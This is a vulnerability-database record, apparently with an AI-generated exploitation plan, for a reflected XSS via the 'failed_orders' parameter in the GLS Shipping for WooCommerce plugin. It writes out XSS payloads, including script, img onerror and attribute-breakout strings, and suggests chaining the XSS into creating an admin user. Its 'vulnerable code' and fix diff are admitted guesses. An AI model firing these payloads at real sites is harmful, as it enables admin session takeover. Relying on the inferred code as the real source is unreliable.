[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYb_j55ZCqIRzmH4ddLV2my3zVr7R2SUvhIam4Tl6IIw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-6417","gls-shipping-for-woocommerce-reflected-cross-site-scripting-via-failedorders","GLS Shipping for WooCommerce \u003C= 1.4.0 - Reflected Cross-Site Scripting via 'failed_orders'","The GLS Shipping for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'failed_orders' parameter in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","gls-shipping-for-woocommerce",null,"\u003C=1.4.0","1.4.1","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-13 17:16:15","2026-05-14 05:30:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F61b9f259-644e-4172-bd99-704b59ec5493?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-6417 (GLS Shipping for WooCommerce)\n\n## 1. Vulnerability Summary\nThe **GLS Shipping for WooCommerce** plugin (up to version 1.4.0) is vulnerable to **Reflected Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin retrieves the value of the `failed_orders` HTTP GET parameter and reflects it back into an administrative notice or a settings page without applying proper sanitization (e.g., `sanitize_text_field`) or output escaping (e.g., `esc_html`). \n\nThis allows an attacker to craft a malicious URL containing JavaScript. When a logged-in administrator clicks this link, the script executes within the context of their session, potentially leading to unauthorized actions such as account takeover or configuration changes.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin.php`\n*   **Query Parameters:**\n    *   `page`: The plugin's admin page slug (inferred as `gls-shipping-for-woocommerce` or `gls-shipping-orders`).\n    *   `failed_orders`: The vulnerable parameter carrying the XSS payload.\n*   **Authentication:** Requires a user with access to the plugin's admin pages (typically `manage_woocommerce` or `manage_options` capabilities).\n*   **Preconditions:** The plugin must be active. The attacker must trick an authenticated user into clicking a crafted link.\n\n## 3. Code Flow\n1.  **Entry Point:** The user navigates to an admin URL containing `page=gls-shipping-for-woocommerce&failed_orders=\u003Cscript>...`.\n2.  **Hook Registration:** The plugin likely hooks into `admin_notices` or the admin page rendering callback (registered via `add_submenu_page`).\n3.  **Vulnerable Logic (Inferred):**\n    *   Inside the callback function (e.g., `GLS_Admin::display_notices` or similar), the code checks for the existence of the parameter.\n    *   `$failed_ids = $_GET['failed_orders'];`\n    *   **Sink:** The value is echoed directly into the HTML: \n        `echo '\u003Cdiv class=\"notice notice-error\">\u003Cp>Sync failed for: ' . $failed_ids . '\u003C\u002Fp>\u003C\u002Fdiv>';`\n4.  **Execution:** The browser interprets the unsanitized `failed_ids` as HTML\u002FJavaScript, executing the payload.\n\n## 4. Nonce Acquisition Strategy\nReflected XSS in a `GET` parameter used for displaying notices typically **does not involve a nonce check**. Nonces are intended to prevent CSRF (unauthorized actions), whereas this vulnerability is a failure of output encoding during a simple `GET` request for a page view.\n\n**If the admin page itself requires a nonce (rare for top-level menu views):**\n1.  Use `wp post create` to create a test page containing any GLS-related shortcode if required to load plugin assets.\n2.  Use `browser_navigate` to the plugin's main settings page: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=gls-shipping-for-woocommerce`.\n3.  Use `browser_eval` to extract any nonces if they appear in the source:\n    `browser_eval(\"document.querySelector('#_wpnonce')?.value\")`\n\n*Note: For this specific Reflected XSS, the attack is triggered by the link itself; a missing nonce check in the display logic is what makes the reflection possible.*\n\n## 5. Exploitation Strategy\nThe goal is to demonstrate script execution via the `failed_orders` parameter.\n\n### Step 1: Discover the Admin Slug\nDetermine the exact `page` parameter value. Common slugs for this plugin:\n*   `gls-shipping-for-woocommerce`\n*   `gls-wc-shipping`\n\n### Step 2: Construct the Payload\nWe will use a diagnostic payload to prove execution:\n`failed_orders=\u003Cscript>console.log(\"XSS_VULNERABLE_CONFIRMED\")\u003C\u002Fscript>`\n\n### Step 3: Execute the Request\nUse the `http_request` tool to simulate an administrator clicking the link.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=gls-shipping-for-woocommerce&failed_orders=%3Cscript%3Econsole.log(%22XSS_VULNERABLE_CONFIRMED%22)%3C\u002Fscript%3E`\n*   **Method:** `GET`\n*   **Headers:** Must include the administrator's session cookies.\n\n### Step 4: Verify via Browser\nSince this is reflected XSS, the result is visible in the DOM. Use `browser_navigate` to the same URL and check the console logs or the page source for the injected `\u003Cscript>` tag.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure GLS Shipping for WooCommerce v1.4.0 is installed and activated.\n2.  **Administrator User:** Use the existing admin account to access the dashboard.\n3.  **WooCommerce:** Ensure WooCommerce is active, as the plugin depends on it.\n\n## 7. Expected Results\n*   The HTTP response will contain the raw string: `\u003Cscript>console.log(\"XSS_VULNERABLE_CONFIRMED\")\u003C\u002Fscript>`.\n*   The `browser_eval` of `window.console.history` (or similar logging) will show the confirmation string.\n*   The payload will be rendered inside a `\u003Cdiv>` with classes like `notice` or `notice-error`.\n\n## 8. Verification Steps\n1.  **Manual Source Check:**\n    `wp eval \"echo 'Search for payload in response: ' . (strpos(file_get_contents('URL_HERE'), 'XSS_VULNERABLE_CONFIRMED') !== false ? 'FOUND' : 'NOT FOUND');\"`\n2.  **DOM Verification:**\n    Use `browser_eval` to check if the script tag exists in the DOM:\n    `browser_eval(\"document.body.innerHTML.includes('XSS_VULNERABLE_CONFIRMED')\")`\n\n## 9. Alternative Approaches\n*   **Attribute Breakout:** If the value is reflected inside an input field (e.g., `value='[input]'`), use:\n    `failed_orders=' onclick='alert(1)' type='text`\n*   **HTML Tag Injection:** If scripts are filtered but HTML is not:\n    `failed_orders=\u003Cimg src=x onerror=alert(1)>`\n*   **Admin Action Chain:** Attempt to use the XSS to trigger an administrative action, such as creating a new admin user via a `fetch()` call to `user-new.php` inside the payload.","The GLS Shipping for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) due to insufficient input sanitization and output escaping on the 'failed_orders' parameter. An unauthenticated attacker can exploit this by tricking a logged-in administrator into clicking a crafted link, leading to arbitrary JavaScript execution in the admin's browser session.","\u002F\u002F Inferred from Research Plan as the source files were not provided\n\u002F\u002F Likely within an admin_notices hook or admin page rendering callback\n\n$failed_ids = $_GET['failed_orders'];\necho '\u003Cdiv class=\"notice notice-error\">\u003Cp>Sync failed for: ' . $failed_ids . '\u003C\u002Fp>\u003C\u002Fdiv>';","--- a\u002Fincludes\u002Fadmin\u002Fclass-gls-admin.php\n+++ b\u002Fincludes\u002Fadmin\u002Fclass-gls-admin.php\n@@ -10,2 +10,2 @@\n-$failed_ids = $_GET['failed_orders'];\n-echo '\u003Cdiv class=\"notice notice-error\">\u003Cp>Sync failed for: ' . $failed_ids . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+$failed_ids = isset($_GET['failed_orders']) ? sanitize_text_field($_GET['failed_orders']) : '';\n+echo '\u003Cdiv class=\"notice notice-error\">\u003Cp>' . esc_html__('Sync failed for: ', 'gls-shipping-for-woocommerce') . esc_html($failed_ids) . '\u003C\u002Fp>\u003C\u002Fdiv>';","The vulnerability is exploited by crafting a malicious URL that targets the WordPress admin dashboard. An attacker identifies the plugin's admin page (e.g., wp-admin\u002Fadmin.php?page=gls-shipping-for-woocommerce) and appends a 'failed_orders' GET parameter containing an XSS payload, such as \u003Cscript>alert(1)\u003C\u002Fscript>. The attacker then tricks an authenticated administrator into clicking this link. Because the plugin reflects the parameter value directly into an administrative notice without using functions like esc_html(), the browser executes the script in the context of the administrator's session. No nonce is required for this reflection as it occurs during a standard GET request used for page display.","gemini-3-flash-preview","2026-05-14 17:12:03","2026-05-14 17:14:12",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.4.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgls-shipping-for-woocommerce\u002Ftags\u002F1.4.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgls-shipping-for-woocommerce.1.4.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgls-shipping-for-woocommerce\u002Ftags\u002F1.4.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgls-shipping-for-woocommerce.1.4.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgls-shipping-for-woocommerce\u002Ftags"]